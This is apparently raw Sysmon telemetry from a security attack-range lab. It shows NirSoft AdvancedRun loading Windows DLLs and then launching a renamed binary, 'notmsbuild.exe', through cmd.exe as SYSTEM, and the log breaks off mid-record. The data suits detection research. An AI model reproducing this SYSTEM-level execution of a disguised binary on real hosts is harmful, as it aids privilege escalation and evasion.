734700x80000000000000004057040Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.203{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057039Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.202{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057038Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.202{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057037Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.202{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 
(rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057036Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.201{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057035Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.201{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057034Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.201{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004057033Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.201{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057032Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.201{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057031Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.199{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057030Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.199{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057029Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.198{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057028Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.197{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057027Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.197{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057026Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.195{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057025Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.194{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057024Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.194{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004057023Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.194{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057022Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.194{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057021Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.193{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057020Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.193{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057019Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.192{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057018Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.190{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057017Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.189{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you 
choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000004057016Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.186{834264DD-DAF8-61EA-5B00-000000002702}41004280C:\Windows\system32\csrss.exe{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004057015Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.185{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\Na
tiveImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a2794aATTAC
KRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000004057014Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.180{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg /runC:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000004016263Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.192{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 154100x80000000000000004016256Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.191{834264DD-0044-61EB-FE05-000000002702}508C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\System32\cmd.exe" /c c:\temp\notmsbuild.exeC:\Windows\System32\NT AUTHORITY\SYSTEM{834264DD-DAE4-61EA-E703-000000000000}0x3e72SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg 
C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg /runATTACKRANGE\Administrator 10341000x80000000000000004016255Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-DAE7-61EA-1700-000000002702}13002268C:\Windows\System32\svchost.exe{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004016254Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.177{834264DD-DAE7-61EA-1700-000000002702}13002268C:\Windows\System32\svchost.exe{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004016253Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21f3|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21bd|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016252Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0044-61EB-FC05-000000002702}2148C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016251Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
